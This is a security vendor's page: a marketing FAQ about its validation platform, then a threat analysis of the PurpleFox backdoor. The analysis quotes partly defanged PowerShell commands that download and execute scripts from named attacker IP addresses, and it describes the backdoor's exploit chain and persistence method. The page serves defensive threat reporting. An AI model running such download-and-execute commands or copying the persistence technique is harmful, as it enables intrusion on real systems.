Frequently Asked Questions

Threats & Technical Analysis

What is the PurpleFox backdoor and how does it use WebSockets?

The PurpleFox backdoor is a malware variant that uses PowerShell commands to download and execute malicious payloads, targeting Windows systems through privilege escalation exploits. It leverages WebSocket communication for efficient, bidirectional, and encrypted channels between infected clients and command-and-control (C2) servers. This approach enables covert data exfiltration and command exchange, making detection more difficult compared to traditional HTTP-based malware. Note: Cymulate can help validate exposure to threats like PurpleFox, but detailed limitations for this specific threat are not publicly documented; ask sales for specifics.

Which vulnerabilities does the PurpleFox backdoor exploit?

PurpleFox targets several Windows privilege escalation vulnerabilities, including CVE-2020-1054, CVE-2019-0808, CVE-2019-1458, and CVE-2021-1732. It checks the Windows version and applied hotfixes before selecting the appropriate exploit. Note: Cymulate's platform can simulate and validate exposure to a wide range of vulnerabilities, but coverage for every specific CVE should be confirmed with Cymulate support.

How does PurpleFox achieve persistence and evade detection?

PurpleFox achieves persistence by installing itself as a DLL protected with VMProtect, modifying registry keys, creating firewall rules, and replacing system files like sens.dll. It also deploys a rootkit driver to hide its files, registry keys, and processes. The malware uses WebSocket-based encrypted channels for C2 communication, making detection more challenging. Note: Cymulate can help organizations test their defenses against such techniques, but not all evasion methods may be covered; consult Cymulate for details.

Features & Capabilities

What is Cymulate and how does it help organizations manage cyber threats?

Cymulate is an AI-powered cyber defense engineering platform that enables organizations to prove, prioritize, and improve their cyber defenses against real threats and exposures. It operates on a continuous loop of prove → prioritize → improve → re-prove, automating threat validation, exposure management, and control optimization. Key features include exposure validation, auto mitigation, continuous threat exposure management (CTEM), Detection Studio, and Threat Studio. Note: Detailed limitations not publicly documented; ask sales for specifics.

Which types of threats can Cymulate validate?

Cymulate can validate a wide range of threats, including malware, phishing, ransomware, advanced persistent threats (APTs), insider threats, network attacks, and web application attacks. The platform simulates diverse attack scenarios to ensure comprehensive security validation. Note: Not all threat types may be covered in every package; confirm with Cymulate for specific coverage.

What is the Immediate Threats Module in Cymulate and how does it benefit users?

The Immediate Threats Module in Cymulate is updated rapidly to reflect new attacks. Users can quickly assess their IT estate for risks posed by emerging threats and implement remedial actions promptly. A Penetration Tester noted: “I am particularly enamored with the immediate threats module and how quickly this gets updated. In short if an attack is new, you can quickly assess your IT estate for how much of a risk is posed to you and implement remedial action quickly.” Note: Coverage for every new threat may vary; check with Cymulate for details.

What integrations does Cymulate support?

Cymulate integrates with over 50 security tools, including SIEM platforms (Azure Sentinel, Splunk, CrowdStrike Falcon LogScale), EDR and anti-malware solutions (CrowdStrike Falcon, Carbon Black EDR, Cisco Secure Endpoint), cloud security tools (AWS GuardDuty, Check Point CloudGuard), web gateways (Cisco Umbrella), vulnerability management (Rapid7 InsightVM), and others like Microsoft Defender, Palo Alto Networks, Wiz, and Zscaler. Note: Integration availability may depend on package and environment; confirm with Cymulate for your use case.

Use Cases & Business Impact

What business impact can customers expect from using Cymulate?

Organizations using Cymulate report an average 30% increase in threat prevention, a 90% improvement in threat detection, a 52% reduction in critical exposures, and a 60% boost in operational efficiency. Threat validation is 40X faster than manual methods, and customers have achieved measurable ROI, such as an 81% reduction in cyber risk within four months (see the Hertz Israel case study). Note: Results may vary by organization and implementation; not all customers will achieve these outcomes.

Who can benefit from using Cymulate?

Cymulate is designed for CISOs, VP Security, SecOps Directors, SOC Leaders, Detection Engineers, Blue Team Leads, Red Teams, Vulnerability Management Teams, GRC/Compliance Teams, and IT/Infrastructure/Cloud Teams. It is suitable for organizations of all sizes and industries seeking to proactively manage and validate their cybersecurity posture. Note: Best fit for organizations prioritizing continuous validation; teams needing only periodic assessments may want to consider alternatives.

What problems does Cymulate solve for security teams?

Cymulate addresses the risk-to-fix gap, uncertainty about real-world readiness, slow manual validation cycles, prioritization of vulnerabilities, siloed tools and teams, lack of actionable remediation, security drift, and difficulty proving improvement to leadership. For example, Hertz Israel reduced cyber risk by 81% in four months, and a retail organization became 12x faster at assessing security controls. Note: Detailed limitations not publicly documented; ask sales for specifics.

Implementation & Ease of Use

How long does it take to implement Cymulate and how easy is it to start?

Cymulate is designed for rapid deployment, operating in agentless mode without the need for additional hardware or complex configurations. Users can start running simulations almost immediately, with only basic infrastructure and internet connectivity required. Customers consistently praise its intuitive interface and ease of use. As Raphael Ferreira, Cybersecurity Manager, stated: “Cymulate is easy to implement and use—all you need to do is click a few buttons, and you receive a lot of practical insights into how you can improve your security posture.” Note: Implementation time may vary for complex environments.

What support and resources are available for Cymulate users?

Cymulate provides multiple support channels, including email ([email protected]), real-time chat, webinars, e-books, technical articles, and videos. Technical documentation and data sheets are available in the resource hub, including guides for Threat Studio and Detection Engineering Automation. Note: Support response times and resource availability may vary by package.

Security & Compliance

What security and compliance certifications does Cymulate hold?

Cymulate is SOC2 Type II certified and holds ISO 27001:2013, ISO 27701, ISO 27017, and CSA STAR Level 1 certifications. These cover information security management, privacy, cloud security, and compliance with the Cloud Controls Matrix. Note: Certification scope and applicability may vary; review official documentation for details.

What product security features does Cymulate offer?

Cymulate provides 2-Factor Authentication (2FA), Single Sign-On (SSO), role-based access controls (RBAC), and data encryption both in transit and at rest. The platform follows strict secure development life cycle procedures, including code review and vulnerability scanning, and is overseen by a Data Protection Officer (DPO) and Chief Information Security Officer (CISO). Note: Feature availability may depend on package and environment; confirm with Cymulate for your requirements.

Pricing & Plans

What is Cymulate's pricing model?

Cymulate uses a subscription-based pricing model, customized to fit the unique needs of each organization. Pricing is determined by the package selected, number of assets covered, and chosen scenarios and features. For a detailed quote, organizations can schedule a demo with the Cymulate team. Note: Exact pricing is not publicly listed; contact Cymulate for a tailored proposal.

Competition & Comparison

How does Cymulate compare to AttackIQ?

Cymulate offers AI-driven, actionable remediation guidance, a daily-updated attack scenario library, and an AI Copilot for automated test creation. It provides continuous, automated testing and is recognized as a Momentum Leader by G2 and a Customer’s Choice in the 2025 Gartner Peer Insights Voice of the Customer for Adversarial Exposure Validation. AttackIQ may not offer the same breadth of daily updates or AI-driven workflow acceleration. Choose Cymulate for rapid, AI-powered validation; choose AttackIQ if you require a different approach to scenario customization. Note: Cymulate may not be the best fit for organizations needing highly specialized, custom-built scenarios outside its library.

How does Cymulate compare to Mandiant Security Validation?

Cymulate powers its platform with AI and automation, offers rapid deployments, easy integrations, and intuitive dashboards. It provides a comprehensive attack library with daily updates and actionable remediation guidance. Mandiant Security Validation is known for its threat intelligence and incident response expertise but may not offer the same level of automation or ease of use. Choose Cymulate for fast deployment and automation; choose Mandiant if you require deep threat intelligence integration. Note: Cymulate may not be the best fit for organizations seeking direct integration with Mandiant’s incident response services.

How does Cymulate compare to Pentera?

Cymulate combines breach simulation, automated red teaming, and deep security control integrations. It allows custom attack chains from a library of over 100,000 actions and delivers daily updates. Pentera focuses on automated penetration testing but may not offer the same breadth of continuous threat updates or integration depth. Choose Cymulate for continuous validation and integration; choose Pentera for periodic automated pen testing. Note: Cymulate may not be the best fit for organizations seeking only periodic, point-in-time assessments.

How does Cymulate compare to Picus Security?

Cymulate delivers full kill-chain coverage, including cloud control validation, and features no-code workflows with a library of over 100,000 attack actions. It provides automated, continuous testing and daily threat updates. Picus Security offers breach and attack simulation but may not match Cymulate’s breadth of cloud validation or workflow simplicity. Choose Cymulate for cloud and workflow coverage; choose Picus if you require a different approach to simulation. Note: Cymulate may not be the best fit for organizations with highly specialized simulation needs outside its template library.

How does Cymulate compare to SafeBreach?

Cymulate leverages AI and automation for exposure validation, offers the industry’s largest attack library with daily updates, and provides intuitive dashboards and actionable reporting. SafeBreach offers breach and attack simulation but may not provide the same speed or breadth of validation. Choose Cymulate for rapid, continuous validation; choose SafeBreach if you require a different simulation approach. Note: Cymulate may not be the best fit for organizations with unique simulation requirements not covered by its library.

Cymulate named a Customers' Choice in 2026 Gartner® Peer Insights™
Learn More
New: Cymulate Cowork for Agentic Cyber Defense Engineering
Learn More
New Bitsight Integration: Turn Threat Intelligence into Validated Security
Learn More
Introducing Cymulate Vero AI for Agentic Cyber Defense Engineering
Learn More

PurpleFox Adds New Backdoor That Uses WebSockets

October 31, 2021

The activity starts with either of the following PowerShell commands being executed: "cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png');MsiMake hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png" "cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http[:]//117.187.136.141[:]13405/57BC9B7E.Png');MsiMake http[:]//117.187.136.141[:]13405/0CFA042F.Png" These commands download a malicious payload from the specified URLs, which are hosted on multiple compromised servers. These servers are part of the PurpleFox botnet, with most of these located in China. The fetched payload is a long script consisting of three components: -Tater (Hot Potato – privilege escalation) -PowerSploit -Embedded exploit bundle binary (privilege escalation) The script targets 64-bit architecture systems. It starts by checking the Windows version and applied hotfixes for the vulnerabilities it is targeting. Windows 7/Windows Server 2008 CVE-2020-1054 (KB4556836, KB4556843) CVE-2019-0808 (KB4489878, KB4489885, KB2882822) Windows 8/Windows Server 2012 CVE-2019-1458 (KB4530702, KB4530730) Windows 10/Windows Server 2019 CVE-2021-1732 (KB4601354, KB4601345, KB4601315, KB4601319) After selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded exploit bundle binary with the target vulnerability and an MSI command as arguments. As a failover, it uses the Tater module to launch the MSI command. The goal is to install the MSI package as an admin without any user interaction. The MSI package starts by removing the following registry keys, which are old Purple Fox installations if any are present: HKLMSYSTEMCurrentControlSetServices{ac00-ac10} It then installs the components (dbcode21mk.log and setupact64.log) of the Purple Fox backdoor to Windows directory. Afterward, it sets two registry values under the key “HKLMSYSTEMCurrentControlSetControlSession Manager”: AllowProtectedRenames to 0x1, and PendingFileRenameOperations The MSI package then runs a .vbs script that creates a Windows firewall rule to block incoming connections on ports 135, 139, and 445. As a final step, the system is restarted to allow PendingFileRenameOperations to take place, replacing sens.dll, which will make the malware run as the System Event Notification Service (SENS). The installed malware is a .dll file protected with VMProtect. Using the other data file installed by the MSI package, it unpacks and manually loads different DLLs for its functionality. It also has a rootkit driver that is also unpacked from the data file and is used to hide its files, registry keys, and processes. The sample starts by copying itself to another file and installing a new service, then restoring the original sens.dll file. Afterward, it loads the driver to hide its files and registries and then spawns and injects a sequence of a 32-bit process to inject its code modules into, as they are 32-bit DLLs. The initial activity for retrieving this backdoor was captured three days after the previous PurpleFox intrusion attempts on the same compromised server. Analysts flagged the following suspicious PowerShell commands: "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/1'))" "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/2'))" "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/3'))" "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/4'))" "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/5'))" "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/8'))" "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/9'))" One notable characteristic analysts rarely see in malware is leveraging WebSocket communication to the C&C servers for an efficient bidirectional channel between the infected client and the server. WebSocket is a communication technology that supports streams of data to be exchanged between a client and a server over just a single TCP session. This is different from traditional request or response protocols like HTTP. This gives the threat actor a more covert alternative to HTTP requests and responses traffic, which creates an opportunity for a more silent exfiltration with less likelihood of being detected. The client will verify the signed message by loading the RSA public key loaded from the configuration payload shown in the previous section. If the signature is verified correctly, key material will be derived from the DH exchange and will be saved as the permanent symmetric AES encryption key (Symmetric_AES_key variable) that will be used as long as the WebSocket channel is active. Once an efficient encrypted session is established over the WebSocket, the client will fingerprint the machine by extracting specific data (including the username, machine name, local IP, MAC address, and Windows version) and will relay such data over the secure channel to get the victim profiled at the server side, which is the final exchange before the WebSocket channel is fully established. It will then listen for further commands, which will be covered in the next section.